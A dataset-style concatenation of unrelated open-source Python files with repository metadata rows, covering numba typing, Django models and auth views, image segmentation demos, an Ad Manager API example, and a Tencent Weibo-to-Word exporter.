initial_ping_timeout=config.backend.ping.initial_timeout,
ping_retries=config.backend.ping.retries,
backoff=config.backend.ping.backoff,
max_to_schedule=config.backend.ping.max_to_schedule,
loop=loop,
inventory_router_url=config.backend.inventory_router,
rpc_client=rpc_client),
loop=loop)
log.info('Starting Mercury Backend Service')
try:
loop.run_until_complete(server.start())
except KeyboardInterrupt:
# TODO: Add generic backend TERM handler
log.info('Sending kill signals')
stop_ping()
server.kill()
finally:
pending = asyncio.Task.all_tasks(loop=loop)
log.debug('Waiting on {} pending tasks'.format(len(pending)))
loop.run_until_complete(asyncio.gather(*pending))
log.debug('Shutting down event loop')
loop.close()
if __name__ == '__main__':
main()
|
apache-2.0
| 5,274,209,554,630,983,000
| 36.181347
| 79
| 0.603122
| false
| 4.462687
| true
| false
| false
|
googleads/googleads-python-lib
|
examples/ad_manager/v202105/forecast_service/get_delivery_forecast_for_line_items.py
|
1
|
1934
|
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets a delivery forecast for two existing line items.
To determine which line items exist, run get_all_line_items.py.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the line items to get forecasts for.
LINE_ITEM_ID_1 = 'INSERT_LINE_ITEM_1_ID_HERE'
LINE_ITEM_ID_2 = 'INSERT_LINE_ITEM_2_ID_HERE'
def main(client, line_item_id1, line_item_id2):
# Initialize appropriate service.
forecast_service = client.GetService('ForecastService', version='v202105')
# Get forecast for line item.
forecast = forecast_service.getDeliveryForecastByIds(
[line_item_id1, line_item_id2], {'ignoredLineItemIds': []})
for single_forecast in forecast['lineItemDeliveryForecasts']:
unit_type = single_forecast['unitType']
print('Forecast for line item %d:\n\t%d %s matched\n\t%d %s delivered\n\t'
'%d %s predicted\n' % (
single_forecast['lineItemId'], single_forecast['matchedUnits'],
unit_type, single_forecast['deliveredUnits'], unit_type,
single_forecast['predictedDeliveryUnits'], unit_type))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, LINE_ITEM_ID_1, LINE_ITEM_ID_2)
|
apache-2.0
| -8,936,408,167,704,282,000
| 36.192308
| 78
| 0.718201
| false
| 3.561694
| false
| false
| false
|
CMLL/Flask-Fixtures
|
setup.py
|
1
|
1677
|
"""
Flask-Fixtures
--------------
A fixtures library for testing Flask apps.
"""
import os
import subprocess
from setuptools import setup
root_dir = os.path.abspath(os.path.dirname(__file__))
package_dir = os.path.join(root_dir, 'flask_fixtures')
# Try to get the long description from the README file or the module's
# docstring if the README isn't available.
try:
README = open(os.path.join(root_dir, 'README.rst')).read()
except:
README = __doc__
setup(
name='Flask-Fixtures',
version='0.3.4',
url='https://github.com/croach/Flask-Fixtures',
license='MIT License',
author='Christopher Roach',
author_email='vthakr@gmail.com',
maintainer='Christopher Roach',
maintainer_email='vthakr@gmail.com',
description='A simple library for adding database fixtures for unit tests using nothing but JSON or YAML.',
long_description=README,
# py_modules=['flask_fixtures'],
# if you would be using a package instead use packages instead
# of py_modules:
packages=['flask_fixtures'],
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=[
'Flask',
'Flask-SQLAlchemy'
],
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Testing'
]
)
|
mit
| -2,382,888,362,794,428,000
| 28.421053
| 111
| 0.648778
| false
| 3.955189
| false
| false
| false
|
sklam/numba
|
numba/core/typing/typeof.py
|
1
|
6676
|
from collections import namedtuple
from functools import singledispatch
import ctypes
import enum
import numpy as np
from numba.core import types, utils, errors
from numba.np import numpy_support
# terminal color markup
_termcolor = errors.termcolor()
class Purpose(enum.Enum):
# Value being typed is used as an argument
argument = 1
# Value being typed is used as a constant
constant = 2
_TypeofContext = namedtuple("_TypeofContext", ("purpose",))
def typeof(val, purpose=Purpose.argument):
"""
Get the Numba type of a Python value for the given purpose.
"""
# Note the behaviour for Purpose.argument must match _typeof.c.
c = _TypeofContext(purpose)
ty = typeof_impl(val, c)
if ty is None:
msg = _termcolor.errmsg(
"cannot determine Numba type of %r") % (type(val),)
raise ValueError(msg)
return ty
@singledispatch
def typeof_impl(val, c):
"""
Generic typeof() implementation.
"""
tp = _typeof_buffer(val, c)
if tp is not None:
return tp
# cffi is handled here as it does not expose a public base class
# for exported functions or CompiledFFI instances.
from numba.core.typing import cffi_utils
if cffi_utils.SUPPORTED:
if cffi_utils.is_cffi_func(val):
return cffi_utils.make_function_type(val)
if cffi_utils.is_ffi_instance(val):
return types.ffi
return getattr(val, "_numba_type_", None)
def _typeof_buffer(val, c):
from numba.core.typing import bufproto
try:
m = memoryview(val)
except TypeError:
return
# Object has the buffer protocol
try:
dtype = bufproto.decode_pep3118_format(m.format, m.itemsize)
except ValueError:
return
type_class = bufproto.get_type_class(type(val))
layout = bufproto.infer_layout(m)
return type_class(dtype, m.ndim, layout=layout,
readonly=m.readonly)
@typeof_impl.register(ctypes._CFuncPtr)
def typeof_ctypes_function(val, c):
from .ctypes_utils import is_ctypes_funcptr, make_function_type
if is_ctypes_funcptr(val):
return make_function_type(val)
@typeof_impl.register(type)
def typeof_type(val, c):
"""
Type various specific Python types.
"""
if issubclass(val, BaseException):
return types.ExceptionClass(val)
if issubclass(val, tuple) and hasattr(val, "_asdict"):
return types.NamedTupleClass(val)
if issubclass(val, np.generic):
return types.NumberClass(numpy_support.from_dtype(val))
from numba.typed import Dict
if issubclass(val, Dict):
return types.TypeRef(types.DictType)
from numba.typed import List
if issubclass(val, List):
return types.TypeRef(types.ListType)
@typeof_impl.register(bool)
def _typeof_bool(val, c):
return types.boolean
@typeof_impl.register(float)
def _typeof_float(val, c):
return types.float64
@typeof_impl.register(complex)
def _typeof_complex(val, c):
return types.complex128
def _typeof_int(val, c):
# As in _typeof.c
nbits = utils.bit_length(val)
if nbits < 32:
typ = types.intp
elif nbits < 64:
typ = types.int64
elif nbits == 64 and val >= 0:
typ = types.uint64
else:
raise ValueError("Int value is too large: %s" % val)
return typ
for cls in utils.INT_TYPES:
typeof_impl.register(cls, _typeof_int)
@typeof_impl.register(np.generic)
def _typeof_numpy_scalar(val, c):
try:
return numpy_support.map_arrayscalar_type(val)
except NotImplementedError:
pass
@typeof_impl.register(str)
def _typeof_str(val, c):
return types.string
@typeof_impl.register(type((lambda a: a).__code__))
def _typeof_code(val, c):
return types.code_type
@typeof_impl.register(type(None))
def _typeof_none(val, c):
return types.none
@typeof_impl.register(type(Ellipsis))
def _typeof_ellipsis(val, c):
return types.ellipsis
@typeof_impl.register(tuple)
def _typeof_tuple(val, c):
tys = [typeof_impl(v, c) for v in val]
if any(ty is None for ty in tys):
return
return types.BaseTuple.from_types(tys, type(val))
@typeof_impl.register(list)
def _typeof_list(val, c):
if len(val) == 0:
raise ValueError("Cannot type empty list")
ty = typeof_impl(val[0], c)
if ty is None:
raise ValueError(
"Cannot type list element of {!r}".format(type(val[0])),
)
return types.List(ty, reflected=True)
@typeof_impl.register(set)
def _typeof_set(val, c):
if len(val) == 0:
raise ValueError("Cannot type empty set")
item = next(iter(val))
ty = typeof_impl(item, c)
return types.Set(ty, reflected=True)
@typeof_impl.register(slice)
def _typeof_slice(val, c):
return types.slice2_type if val.step in (None, 1) else types.slice3_type
@typeof_impl.register(enum.Enum)
@typeof_impl.register(enum.IntEnum)
def _typeof_enum(val, c):
clsty = typeof_impl(type(val), c)
return clsty.member_type
@typeof_impl.register(enum.EnumMeta)
def _typeof_enum_class(val, c):
cls = val
members = list(cls.__members__.values())
if len(members) == 0:
raise ValueError("Cannot type enum with no members")
dtypes = {typeof_impl(mem.value, c) for mem in members}
if len(dtypes) > 1:
raise ValueError("Cannot type heterogeneous enum: "
"got value types %s"
% ", ".join(sorted(str(ty) for ty in dtypes)))
if issubclass(val, enum.IntEnum):
typecls = types.IntEnumClass
else:
typecls = types.EnumClass
return typecls(cls, dtypes.pop())
@typeof_impl.register(np.dtype)
def _typeof_dtype(val, c):
tp = numpy_support.from_dtype(val)
return types.DType(tp)
@typeof_impl.register(np.ndarray)
def _typeof_ndarray(val, c):
try:
dtype = numpy_support.from_dtype(val.dtype)
except NotImplementedError:
raise ValueError("Unsupported array dtype: %s" % (val.dtype,))
layout = numpy_support.map_layout(val)
readonly = not val.flags.writeable
return types.Array(dtype, val.ndim, layout, readonly=readonly)
@typeof_impl.register(types.NumberClass)
def typeof_number_class(val, c):
return val
@typeof_impl.register(types.Literal)
def typeof_literal(val, c):
return val
@typeof_impl.register(types.TypeRef)
def typeof_typeref(val, c):
return val
@typeof_impl.register(types.Type)
def typeof_numba_type(val, c):
if isinstance(val, types.BaseFunction):
return val
elif isinstance(val, (types.Number, types.Boolean)):
return types.NumberClass(val)
else:
return types.TypeRef(val)
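# --- Hedged usage sketch (not part of the original module) ---
# A minimal illustration of the public typeof() entry point defined above,
# using plain Python and NumPy values. The sample values are arbitrary; the
# exact integer width printed for typeof(3) depends on the platform intp.
def _typeof_examples():
    print(typeof(3))                                    # intp / int64
    print(typeof(2.5))                                  # float64
    print(typeof((1, 2.5)))                             # tuple of the element types
    print(typeof(np.zeros((3, 4), dtype=np.float32)))   # array(float32, 2d, C)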
|
bsd-2-clause
| 5,694,277,277,401,790,000
| 26.02834
| 76
| 0.658778
| false
| 3.400917
| false
| false
| false
|
xingnix/learning
|
imageprocessing/python/10/segment.py
|
1
|
1154
|
import matplotlib.pyplot as plt
import numpy as np
import cv2
from skimage import io,color,data,filters,exposure,util,transform
#plt.switch_backend('qt5agg')
def otsu():
im=data.coins()
f=np.zeros(255)
minf=0
mini=0
for i in range(100,200):
c1=im[im<=i]
c2=im[im>i]
m1=np.mean(c1)
m2=np.mean(c2)
std1=np.std(c1)
std2=np.std(c2)
std3=np.std([m1,m2])
f[i]=std3/(1+std1*std2)
        # keep the threshold that maximises the separability criterion f[i]
        if f[i] > minf:
            minf = f[i]
            mini = i
    io.imsave('coins.png',im)
    io.imsave('coins-otsu.png',np.uint8(im>mini)*255)
def line_detect():
im=data.text()
seg=im<100
r=transform.radon(seg)
rho,theta=np.unravel_index(np.argmax(r),r.shape)
rho=rho-r.shape[0]/2
x=np.int(rho*np.cos((theta+90)*np.pi/180)+im.shape[0]/2)
y=np.int(rho*np.sin((theta+90)*np.pi/180)+im.shape[1]/2)
dx=np.cos((theta)*np.pi/180)
dy=np.sin((theta)*np.pi/180)
l=1000
res=im.copy()
cv2.line(res,(np.int(y-dy*l),np.int(x-dx*l)),(np.int(y+dy*l),np.int(x+dx*l)),255,2)
io.imsave('text.png',im)
io.imsave('text-line.png',res)
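# --- Hedged usage sketch (not part of the original script) ---
# Neither function above is called anywhere in this file; the guard below
# simply runs both demos against the bundled skimage sample images and writes
# the PNG files whose names are hard-coded in otsu() and line_detect().
if __name__ == '__main__':
    otsu()         # writes coins.png and coins-otsu.png
    line_detect()  # writes text.png and text-line.png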
|
gpl-3.0
| 4,045,463,473,780,565,500
| 23.0625
| 87
| 0.571057
| false
| 2.364754
| false
| false
| false
|
AstroMatt/esa-time-perception
|
backend/api_v2/models/trial.py
|
1
|
9704
|
import json
import statistics
from django.db import models
from django.db.models import DateTimeField
from django.db.models import CharField
from django.db.models import FloatField
from django.db.models import EmailField
from django.db.models import BooleanField
from django.db.models import PositiveSmallIntegerField
from django.db.models import TextField
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from backend.api_v2.models import Click
from backend.api_v2.models import Event
from backend.api_v2.models import Survey
class Trial(models.Model):
TIME_MORNING = 'morning'
TIME_EVENING = 'evening'
TIME_OTHER = 'other'
TIME_CHOICES = [
(TIME_MORNING, _('Morning')),
(TIME_EVENING, _('Evening')),
(TIME_OTHER, _('Other')),
]
http_request_sha1 = CharField(verbose_name=_('SHA1'), max_length=40, db_index=True, unique=True, null=True, blank=True, default=None)
start_datetime = DateTimeField(verbose_name=_('Start datetime'), db_index=True)
end_datetime = DateTimeField(verbose_name=_('End datetime'))
colors = CharField(verbose_name=_('Color order'), max_length=50)
device = CharField(verbose_name=_('Device'), max_length=50)
location = CharField(verbose_name=_('Location'), max_length=50)
time = CharField(verbose_name=_('Time'), max_length=30, choices=TIME_CHOICES, null=True, blank=True, default=None)
uid = EmailField(verbose_name=_('User ID'), db_index=True)
polarization = CharField(verbose_name=_('Polarization'), max_length=50, null=True, blank=True, default=None)
timeout = FloatField(verbose_name=_('Timeout'), help_text=_('Seconds per color'))
regularity = PositiveSmallIntegerField(verbose_name=_('Regularity'), help_text=_('Click every X seconds'))
attempt = PositiveSmallIntegerField(verbose_name=_('Attempt'), null=True, blank=True, default=True)
is_valid = BooleanField(verbose_name=_('Valid?'), default=None, blank=True, null=True, db_index=True)
time_between_clicks = TextField(verbose_name=_('Time between clicks'), blank=True, null=True, default=None)
count_all = PositiveSmallIntegerField(verbose_name=_('Count'), null=True, blank=True)
count_blue = PositiveSmallIntegerField(verbose_name=_('Count - blue'), null=True, blank=True)
count_red = PositiveSmallIntegerField(verbose_name=_('Count - red'), null=True, blank=True)
count_white = PositiveSmallIntegerField(verbose_name=_('Count - white'), null=True, blank=True)
tempo_all = FloatField(verbose_name=_('Tempo'), null=True, blank=True)
tempo_blue = FloatField(verbose_name=_('Tempo - blue'), null=True, blank=True)
tempo_red = FloatField(verbose_name=_('Tempo - red'), null=True, blank=True)
tempo_white = FloatField(verbose_name=_('Tempo - white'), null=True, blank=True)
regularity_all = FloatField(verbose_name=_('Regularity'), null=True, blank=True)
regularity_blue = FloatField(verbose_name=_('Regularity - blue'), null=True, blank=True)
regularity_red = FloatField(verbose_name=_('Regularity - red'), null=True, blank=True)
regularity_white = FloatField(verbose_name=_('Regularity - white'), null=True, blank=True)
interval_all = FloatField(verbose_name=_('Interval'), null=True, blank=True)
interval_blue = FloatField(verbose_name=_('Interval - blue'), null=True, blank=True)
interval_red = FloatField(verbose_name=_('Interval - red'), null=True, blank=True)
interval_white = FloatField(verbose_name=_('Interval - white'), null=True, blank=True)
def get_absolute_url(self):
return reverse('api-v2:report', args=[self.uid])
@property
def survey(self):
return Survey.objects.get(trial=self)
@staticmethod
def add(http_request_sha1, trial, surveys, clicks, events):
trial, _ = Trial.objects.get_or_create(http_request_sha1=http_request_sha1, defaults=trial)
if surveys:
Survey.objects.get_or_create(trial=trial, **Survey.clean(surveys))
for click in clicks:
Click.objects.get_or_create(trial=trial, **click)
for event in events:
Event.objects.get_or_create(trial=trial, **event)
trial.validate()
trial.calculate()
Click.objects.filter(trial=trial).delete()
Event.objects.filter(trial=trial).delete()
return trial
def __str__(self):
return f'[{self.start_datetime:%Y-%m-%d %H:%M}] ({self.location}, {self.device}) {self.uid}'
class Meta:
verbose_name = _('Trial')
verbose_name_plural = _('Trials')
def get_data(self):
data = self.__dict__.copy()
data.pop('_state')
return data
def save(self, *args, **kwargs):
self.uid = self.uid.lower()
return super().save(*args, **kwargs)
def validate(self):
self.validate_clicks('blue')
self.validate_clicks('red')
self.validate_clicks('white')
self.validate_trial()
def calculate(self):
self.calculate_count()
self.calculate_tempo()
self.calculate_regularity()
self.calculate_interval()
def validate_clicks(self, color, elements_to_drop=2):
clicks = Click.objects.filter(trial=self, color=color).order_by('datetime')
for invalid in clicks[:elements_to_drop]:
invalid.is_valid = False
invalid.save()
for valid in clicks[elements_to_drop:]:
valid.is_valid = True
valid.save()
def validate_trial(self, min=25, max=200):
if not self.tempo_all:
self.calculate()
if min <= self.tempo_all <= max:
self.is_valid = True
else:
self.is_valid = False
self.save()
def get_time_between_clicks(self):
"""
Obliczamy czasowy współczynnik regularności dla koloru
1. Dla każdego kliknięcia w kolorze od czasu następnego (n+1) kliknięcia odejmuj czas poprzedniego (n) - interwały czasu pomiędzy kliknięciami
2. >>> {"czerwony": [1.025, 0.987, 1.000, 1.01...], "biały": [1.025, 0.987, 1.000, 1.01...], "niebieski": [1.025, 0.987, 1.000, 1.01...], "wszystkie": [1.025, 0.987, 1.000, 1.01...]}
"""
clicks = Click.objects.filter(trial=self, is_valid=True).order_by('datetime')
def get_time_deltas(series):
for i in range(1, len(series)):
d1 = series[i - 1].datetime
d2 = series[i].datetime
yield (d2 - d1).total_seconds()
blue = list(get_time_deltas(clicks.filter(color='blue')))
red = list(get_time_deltas(clicks.filter(color='red')))
white = list(get_time_deltas(clicks.filter(color='white')))
time_regularity_series = {
'all': blue + red + white,
'blue': blue,
'red': red,
'white': white}
self.time_between_clicks = json.dumps(time_regularity_series)
self.save()
return time_regularity_series
def calculate_count(self):
clicks = Click.objects.filter(trial=self, is_valid=True)
self.count_all = clicks.all().count()
self.count_blue = clicks.filter(color='blue').count()
self.count_red = clicks.filter(color='red').count()
self.count_white = clicks.filter(color='white').count()
self.save()
def calculate_tempo(self, precision=2):
"""
Zliczam ilość wszystkich kliknięć na każdym z kolorów i sumuję je
1. Określam procentowy współczynnik regularności: (ilość czasu / co ile sekund miał klikać) - 100%; n kliknięć - x%
2. Wyliczenie procentowych współczynników regularności (z kroku powyżej) dla każdego z kolorów osobno
3. >>> {"biały": 100, "czerwony": 110, "niebieski": 90} // wartości są w procentach
"""
percent_coefficient = float(self.timeout) / float(self.regularity)
self.tempo_all = round(self.count_all / (percent_coefficient * 3) * 100, precision)
self.tempo_blue = round(self.count_blue / percent_coefficient * 100, precision)
self.tempo_red = round(self.count_red / percent_coefficient * 100, precision)
self.tempo_white = round(self.count_white / percent_coefficient * 100, precision)
self.save()
def calculate_regularity(self, precision=4):
"""
Wyliczamy odchylenie standardowe dla wszystkich razem (po appendowaniu list - 60 elem), oraz dla każdego koloru osobno (listy po 20 elementów)
1. podnosimy każdy element listy do kwadratu
2. sumujemy kwadraty
3. pierwiastkujemy sumę
4. dzielimy pierwiastek przez ilość elementów
"""
clicks = self.get_time_between_clicks()
def stdev(series):
try:
return round(statistics.stdev(series), precision)
except statistics.StatisticsError:
return None
self.regularity_all = stdev(clicks['all'])
self.regularity_blue = stdev(clicks['blue'])
self.regularity_red = stdev(clicks['red'])
self.regularity_white = stdev(clicks['white'])
self.save()
def calculate_interval(self, precision=4):
clicks = self.get_time_between_clicks()
def mean(series):
try:
mean = round(statistics.mean(series), precision)
return abs(mean)
except statistics.StatisticsError:
return None
self.interval_all = mean(clicks['all'])
self.interval_blue = mean(clicks['blue'])
self.interval_red = mean(clicks['red'])
self.interval_white = mean(clicks['white'])
self.save()
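# --- Hedged worked example (not part of the original module) ---
# The tempo computed in calculate_tempo() is plain arithmetic; the numbers
# below are made up only to show the scale of the result. With a 20-second
# timeout per color and an expected click every second, a user who produced
# 18 clicks on one color clicked at 90% of the expected tempo.
def _tempo_example(timeout=20.0, regularity=1, count_blue=18, precision=2):
    percent_coefficient = float(timeout) / float(regularity)   # expected clicks per color
    tempo_blue = round(count_blue / percent_coefficient * 100, precision)
    return tempo_blue                                           # -> 90.0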
|
mit
| 3,254,712,368,374,055,000
| 40.991304
| 190
| 0.640609
| false
| 3.380469
| false
| false
| false
|
fatiherikli/komposto.org
|
auth/views.py
|
1
|
2165
|
import json
from django.contrib.auth import logout, login, authenticate
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.db.models import Q, Count
from django.views.generic import (
FormView, CreateView, RedirectView, DetailView, UpdateView
)
from auth.mixins import LoginRequiredMixin
from auth.forms import (RegistrationForm, AuthenticationForm,
ProfileUpdateForm)
class RegistrationView(CreateView):
form_class = RegistrationForm
template_name = "auth/register.html"
def form_valid(self, form):
response = super(RegistrationView, self).form_valid(form)
user = authenticate(username=form.cleaned_data["username"],
password=form.cleaned_data["password1"])
login(self.request, user)
return response
def get_success_url(self):
return reverse("home")
class LoginView(FormView):
form_class = AuthenticationForm
template_name = "auth/login.html"
def form_valid(self, form):
login(self.request, form.get_user())
return super(LoginView, self).form_valid(form)
def get_success_url(self):
return self.request.GET.get("next") or reverse("home")
def get_context_data(self, **kwargs):
context = super(LoginView, self).get_context_data(**kwargs)
context["next"] = self.request.GET.get("next", "")
return context
class LogoutView(LoginRequiredMixin, RedirectView):
def get(self, request, *args, **kwargs):
logout(request)
return super(LogoutView, self).get(request, *args, **kwargs)
def get_redirect_url(self, **kwargs):
return reverse("home")
class ProfileDetailView(DetailView):
slug_field = 'username'
slug_url_kwarg = 'username'
context_object_name = "profile"
model = User
class ProfileUpdateView(LoginRequiredMixin, UpdateView):
form_class = ProfileUpdateForm
def get_object(self, queryset=None):
return self.request.user
def get_success_url(self):
return '/'
|
mit
| 2,634,806,515,822,161,400
| 29.069444
| 68
| 0.684988
| false
| 4.024164
| false
| false
| false
|
coolcooldool/tencent-weibo-exporter
|
version15/tencent_util.py
|
1
|
12471
|
# -*- coding: utf-8 -*-
'''
Created on 2017/12/21
@author: yuyang
'''
import os
from urllib import request
import uuid
import re
import docx_ext
from docx.shared import Pt
from docx.shared import RGBColor
from docx.shared import Inches
JPEG_EXTENSION = '.jpg'
PNG_EXTENSION = '.png'
GIF_EXTENSION = '.gif'
SPLIT_STRING = '///'
TOPIC_STRING = 'TTOOPPIICC'
EMOJI_STRING = 'EEMMOOJJII'
FRIEND_STRING = 'FFRRIIEENNDD'
URL_STRING = 'UURRLL'
QQEMO_STRING = 'QQEEMMOO'
OTHEREMO_STRING = 'OOTTHHEERR'
def add_author(document, author):
para = document.add_paragraph()
run = para.add_run(author)
font = run.font
#font.name = 'Microsoft YaHei'
font.size = Pt(12)
font.color.rgb = RGBColor(0x43, 0x6E, 0xEE)
def add_content(document, content, para = None, font_size = 16):
if content.__contains__('k.t.qq.com'):
pattern = re.compile(r'(<a href="http://k.t.qq.com.*?</a>)', re.S)
topics = re.findall(pattern, content)
for topic in topics:
topic_word = topic.split('#')[1]
content = content.replace(topic, SPLIT_STRING + TOPIC_STRING + '#' + topic_word + '#' + SPLIT_STRING)
if content.__contains__('www/mb/images/emoji'):
pattern_emoji = re.compile(r'(<img.*?>)', re.S)
pattern_emoji_img = re.compile(r"crs='(.*?)'", re.S)
emojis = re.findall(pattern_emoji, content)
for emoji in emojis:
emoji_url = re.findall(pattern_emoji_img, emoji)[0]
filename = download_pic(emoji_url, PNG_EXTENSION)
content = content.replace(emoji, SPLIT_STRING + EMOJI_STRING + filename + SPLIT_STRING)
if content.__contains__('em rel="@'):
pattern_friend = re.compile(r'(<em rel=.*?</em>)', re.S)
pattern_friend_name = re.compile(r'<em.*?title="(.*?)"', re.S)
friends = re.findall(pattern_friend, content)
for friend in friends:
friend_name = re.findall(pattern_friend_name, friend)[0]
content = content.replace(friend, SPLIT_STRING + FRIEND_STRING + friend_name + SPLIT_STRING)
if content.__contains__('http://url.cn'):
pattern_url = re.compile(r'(<a href=.*?</a>)', re.S)
pattern_url_str = re.compile(r'<a href="(.*?)"', re.S)
urls = re.findall(pattern_url, content)
for url in urls:
url_str = re.findall(pattern_url_str, url)[0]
content = content.replace(url, SPLIT_STRING + URL_STRING + url_str + SPLIT_STRING)
if content.__contains__('www/mb/images/face'):
pattern_qqemo = re.compile(r'(<img.*?>)', re.S)
pattern_qqemo_img = re.compile(r"crs='(.*?)'", re.S)
qqemos = re.findall(pattern_qqemo, content)
for qqemo in qqemos:
qqemo_url = re.findall(pattern_qqemo_img, qqemo)[0]
filename = download_pic(qqemo_url, GIF_EXTENSION)
content = content.replace(qqemo, SPLIT_STRING + QQEMO_STRING + filename + SPLIT_STRING)
if content.__contains__('<img class='):
pattern_other_emo = re.compile(r'(<img.*?>)', re.S)
pattern_other_emo_img = re.compile(r'<img.*?crs=(.*?) title=', re.S)
pattern_other_emo_img_only = re.compile(r'<img.*?crs=(.*?)>', re.S)
#<img class='crs dn' crs='http://qzonestyle.gtimg.cn/qzone/em/e2043.gif'>
pattern_other_emos = re.findall(pattern_other_emo, content)
for other_emo in pattern_other_emos:
other_emo_match = re.findall(pattern_other_emo_img, other_emo)
if not other_emo_match:# some emoji have special pattern
other_emo_match = re.findall(pattern_other_emo_img_only, other_emo)
other_emo_url = other_emo_match[0]
other_emo_url = other_emo_url[1:-1]# delete start and end mark ' "
filename = download_pic(other_emo_url, other_emo_url[-4:])
content = content.replace(other_emo, SPLIT_STRING + OTHEREMO_STRING + filename + SPLIT_STRING)
content_parts = content.split(SPLIT_STRING)
if not para:
para = document.add_paragraph()
for content_part in content_parts:
# delete first <div> mark
if content_part.startswith('<div>'):
content_part = content_part[5:]
if content_part.startswith(TOPIC_STRING):
run = para.add_run(content_part.replace(TOPIC_STRING, ''))
font = run.font
font.italic = True
font.bold = False
font.size = Pt(font_size)
font.color.rgb = RGBColor(0x00, 0x00, 0xCD)
elif content_part.startswith(EMOJI_STRING):
run = para.add_run()
filename = content_part.replace(EMOJI_STRING, '')
run.add_picture(filename)
elif content_part.startswith(FRIEND_STRING):
run = para.add_run(content_part.replace(FRIEND_STRING, ''))
font = run.font
font.italic = True
font.bold = False
font.size = Pt(font_size - 2)
font.color.rgb = RGBColor(0xFF, 0x45, 0x00)
elif content_part.startswith(URL_STRING):
docx_ext.add_hyperlink(para, content_part.replace(URL_STRING, ''),
content_part.replace(URL_STRING, ''), '1E90FF', True)
elif content_part.startswith(QQEMO_STRING):
run = para.add_run()
filename = content_part.replace(QQEMO_STRING, '')
run.add_picture(filename)
elif content_part.startswith(OTHEREMO_STRING):
run = para.add_run()
filename = content_part.replace(OTHEREMO_STRING, '')
run.add_picture(filename)
else:
content_part = content_part.replace('&', '&')
content_part = content_part.replace('>', '>')
content_part = content_part.replace('"', '"')
content_part = content_part.replace('<', '<')
run = para.add_run(content_part)
font = run.font
font.bold = False
font.size = Pt(font_size)
font.color.rgb = RGBColor(0x08, 0x08, 0x08)
def add_quotation(document, quotation):
if not quotation:
return
quotation_items = analyze_quotation(quotation)
para = document.add_paragraph(style='IntenseQuote')
if len(quotation_items) == 1:
run = para.add_run(quotation_items[0])
font = run.font
font.bold = False
font.size = Pt(12)
font.color.rgb = RGBColor(0xA9, 0xA9, 0xA9)
return
run = para.add_run(quotation_items[0] + u':')
font = run.font
font.bold = False
font.size = Pt(12)
font.color.rgb = RGBColor(0x48, 0xD1, 0xCC)
add_content(document, quotation_items[1] + '\n', para, 12)
filenames = analyze_pic(quotation)
for filename in filenames:
try:
run_pic = para.add_run()
run_pic.add_picture(filename, width=Inches(3))
para.add_run('\n')
except:
print('转帖插入图片出错:' + filename)
run_time = para.add_run(quotation_items[2])
font_time = run_time.font
font_time.bold = False
font_time.size = Pt(8)
font_time.color.rgb = RGBColor(0x69, 0x69, 0x69)
def add_picture(document, story):
filenames = analyze_pic(story)
for filename in filenames:
try:
document.add_picture(filename, width=Inches(5))
except:
print('插入图片出错:' + filename)
def add_time(document, time):
para = document.add_paragraph()
run = para.add_run(time)
font = run.font
font.italic = True
#font.name = 'Microsoft YaHei'
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
def add_location(document, story):
location_items = analyze_loc(story)
if len(location_items) <= 0:
return
link_name = location_items[2]
google_map_url = 'https://maps.google.com/maps?q=' + location_items[0] + ',' + location_items[1]
print(google_map_url)
para = document.add_paragraph()
run = para.add_run(u'位置:')
font = run.font
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
docx_ext.add_hyperlink(para, google_map_url, link_name, '4169E1', False)
def add_video(document, story):
video_items = analyze_video(story)
if not video_items:
return
para = document.add_paragraph()
run = para.add_run()
font = run.font
font.size = Pt(10)
font.color.rgb = RGBColor(0x7A, 0x7A, 0x7A)
docx_ext.add_hyperlink(para, video_items[0], video_items[1], '4169E1', False)
try:
document.add_picture(video_items[3], width=Inches(3))
except:
print('视频封面插入出错:' + video_items[3])
def download_pic(url, extension):
try:
if not os.path.exists('.//pics'):
os.mkdir('.//pics')
filename = '.\\pics\\' + str(uuid.uuid4()) + extension
request.urlretrieve(url, filename)
except Exception:
print('下载图片出错:' + url)
return filename
def analyze_pic(story):
filenames = []
if story.__contains__('class="picBox"'):
pattern = re.compile(r'<div class="picBox">\n<a href="(.*?)" data-like', re.S)
img_url = re.findall(pattern, story)[0]
print('图片:', img_url)
filename = download_pic(img_url, JPEG_EXTENSION)
filenames.append(filename)
elif story.__contains__('class="tl_imgGroup'):
pattern = re.compile(r'<div class="tl_imgGroup(.*?)<div class="miniMultiMedia clear"', re.S)
imgs_str = re.findall(pattern, story)[0]
pattern_img = re.compile(r'<a href="(.*?)" class="tl_imgGroup', re.S)
imgs = re.findall(pattern_img, imgs_str)
for img_url in imgs:
print('图片:', img_url)
filename = download_pic(img_url, JPEG_EXTENSION)
filenames.append(filename)
return filenames
def analyze_loc(story):
location_items = []
if story.__contains__('class="areaInfo"'):
pattern = re.compile(r'boss="btn_check_tweetNear".*?lat=(.*?)&lng=(.*?)&addr=(.*?)" target', re.S)
location_items = re.findall(pattern, story)[0]
print(u'位置:' + location_items[2])
print(u'经度:' + location_items[0])
print(u'纬度:' + location_items[1])
return location_items
def analyze_video(story):
video_items = []
if story.__contains__('class="videoBox"'):
pattern = re.compile(r'<div class="videoBox".*?realurl="(.*?)".*?reltitle="(.*?)".*?<img.*?crs="(.*?)"', re.S)
video_items = re.findall(pattern, story)[0]
print(u'视频名称:' + video_items[1])
print(u'视频网址:' + video_items[0])
